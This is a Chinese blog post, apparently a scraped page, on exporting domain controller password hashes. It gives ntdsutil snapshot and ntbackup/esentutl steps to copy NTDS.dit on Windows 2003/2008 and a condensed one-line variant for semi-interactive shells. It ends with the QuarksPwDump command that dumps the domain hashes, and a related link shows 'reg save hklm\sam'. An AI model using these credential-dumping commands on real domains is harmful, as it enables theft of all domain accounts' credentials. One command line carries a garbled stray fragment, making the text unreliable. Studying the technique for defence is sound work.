quarkspwdump作者介绍的用法:

1. Windows 2008
   
  Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make
  filesystem snapshots while the operating is running and writing to current backuped files.
   
  Here is a way to backup NTDS.dit file while a domain controller is running:
   
  #ntdsutil
  #snapshot
  #activate instance ntds
  #create
  #mount {GUID}
  #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
  #unmount {GUID}
  #quit
  #quit
   
  If AD server hasn't the "AD DS role", you have to use dsdbutil.exe command in the same way.
   
   
   
 2. Windows 2003  
  On this version, VSS has been implemented but not NTDS-type snapshots.
  But you can use ntbackup tool, here is the procedure:
   
  - Launch NTBACKUP gui
  - Use backup wizard (advanced)
  - Choose to save system state only and choose output filename
  - Wait some minutes
  - Use restore wizard (advanced)
  - Choise your backup, click next and use advanced button
  - Choose to restore file on another location (c:\tmp\ for example)
  - Choose to overwrite everything and next uncheck all restoration parameters
  - Validate and wait some minutes
  - Open a command shell to "c:\tmp\Active Directory"
  - We need to repair the database with this command
  #esentutl /p ntds.dit
  - Validate warning and wait some minutes
   
  ntds.dit file can now be used with quarkspwdump.

其中

#ntdsutil

#snapshot

#activate instance ntds

#create

#mount {GUID}

#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit

#unmount {GUID}

#quit

#quit

适用于可交互式或直接登录状态。

如果是半交互式的,可以采用如下方法(网上看到的用法):

ntdsutil  snapshot  "activate  instance  ntds"  create  quit  quit

ntdsutil  snapshot  "mount {GUID}"  quit  quit

copy  MOUNT_POINT\windows\NTDS\ntds.dit  c:\ntds.dit

ntdsutil  snapshot  "unmount {GUID}"  quit  quit2 v- p5 I2 O  E

ntdsutil  snapshot  "delete {GUID}"  quit  quit

最后

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

windows 2003 windows 2008 windows 2012 导出域控hash的方法的更多相关文章

  1. 离线提取域控HASH的方法

    1.注册表提取 提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可. reg save hklm\sam s ...

  2. Windows Server 2003、2008、2012系统的安装

    说在前面的话 Windows Server 2003,和Windows XP十分相似,可以简单地认为Windows Server 2003是在Windows XP的基础上多了一些服务器管理和操作的功能 ...

  3. Windows 2012建立域控(AD DS)详解

    Active Directory概述:          使用 Active Directory(R) 域服务 (AD DS) 服务器角色,可以创建用于用户和资源管理的可伸缩.安全及可管理的基础机构, ...

  4. Windows 2003 AD升级Windows 2008

    把Windows 2008 R2的光盘放到主域控中,运行 adprep32 /forestPrep adprep32 /domainprep adprep32 /domainprep /gpprep ...

  5. Windows servers 2008 环境下,域控DC和DNS,分离搭建过程。

    近来做有关于window服务器方面运维的实验,正好借此记录下来,便于日后回顾. 通常情况下,域控DC服务器和DNS服务器一般不在一起,所以需要将其分开建立.而这个时候两个服务器的建立有先后顺序,本文会 ...

  6. Description of security events in Windows 2003/7/2008

    https://technet.microsoft.com/library/cc163121.aspx#EKH https://support.microsoft.com/en-us/kb/97751 ...

  7. windows 2003添加删除windows组件中无iis应用程序服务器项的解决方法

    解决方法如下: 1.开始 -- 运行,输入 c:\Windows\inf\sysoc.inf,会打开这个文件;在sysoc.inf中找到"[Components]"这一段,并继续找 ...

  8. windows 2003 上安装windows liver writer

    下载"resource hacker"软件,修改exe文件,找到config--config0-0 替换为: <?xml version="1.0" en ...

  9. windows 2003 远程桌面无法使用剪贴板共享纯文本的解决方法(亲测可用)

    远程桌面无法使用剪贴板共享纯文本的解决方法========================================以下操作须在远程桌面上操作,本地机没用的!================== ...

随机推荐

  1. matlab-层次分析法

    层次分析法(AHP)是把问题条理化.层次化,构造出一个有层次的结构模型的方法. 比如要选择旅游地,有3个选择方案,苏杭.北戴河和桂林.选择过程需要考虑多个因素,比如景色.费用.居住.饮食和旅途. 1. ...

  2. 移动端适配(rem & viewport)--移动端开发整理笔记(四)

    移动端适配 通过rem适配 em: 根据元素自身的字体大小来计算自己的尺寸 rem: (root em) 根据根节点(html)的字体大小来计算自己的尺寸   我们知道,在不同的手机设备,分辨率大小是 ...

  3. 树莓派项目(1-3 )目标识别 NNPACK支持版Darknet,可用于树莓派等嵌入设备

    https://github.com/digitalbrain79/darknet-nnpack https://github.com/AlexeyAB/darknet#how-to-train-to ...

  4. windbg是如何搜索符号文件的?

    来个样例 我的符号目录设置是: 用我们在windows下调试必须用到的ntdll.dll模块来讲下windbg加载符号文件的过程.windbg加载符号文件时,会首先根据配置的符号目录信息,在本地符号目 ...

  5. SpringBoot配置文件加载位置与优先级

    1. 项目内部配置文件 spring boot 启动会扫描以下位置的application.properties或者application.yml文件作为Spring boot的默认配置文件 –fil ...

  6. 如何使用离线存储(localStorage)?

    1.存储数据:localStorage.setItem("属性","属性值") 2.获取本地存储的值:localStorage.getItem("属性 ...

  7. django-debug-toolbar调试请求接口

    第一步: pip install django-debug-toolbar 安装完成,往下继续配置. 第二步: 打开项目,找到settings.py 文件.  找到: INSTALLED_APPS-- ...

  8. 通过inspect在电脑的Chrome上查看手机上的H5

    首先打开手机的开发者模式,(在连续点击7次版本号,系统会提示已经打开开发者模式) 然后打开一个手机浏览器. 然后在电脑上打开chrome://inspect/#devices.这是就会出现手机上浏览器 ...

  9. Maven 教程(11)— Maven远程仓库的各种配置

    原文地址:https://blog.csdn.net/liupeifeng3514/article/details/79545408 1.远程仓库的配置 在平时的开发中,我们往往不会使用默认的中央仓库 ...

  10. QuantLib 金融计算——案例之普通欧式期权分析

    目录 QuantLib 金融计算--案例之普通欧式期权分析 概述 普通欧式期权公式法定价 1. 配置期权合约条款 2. 构建期权对象 3. 配置定价引擎 4. 计算 题外话:天数计算规则 Quote ...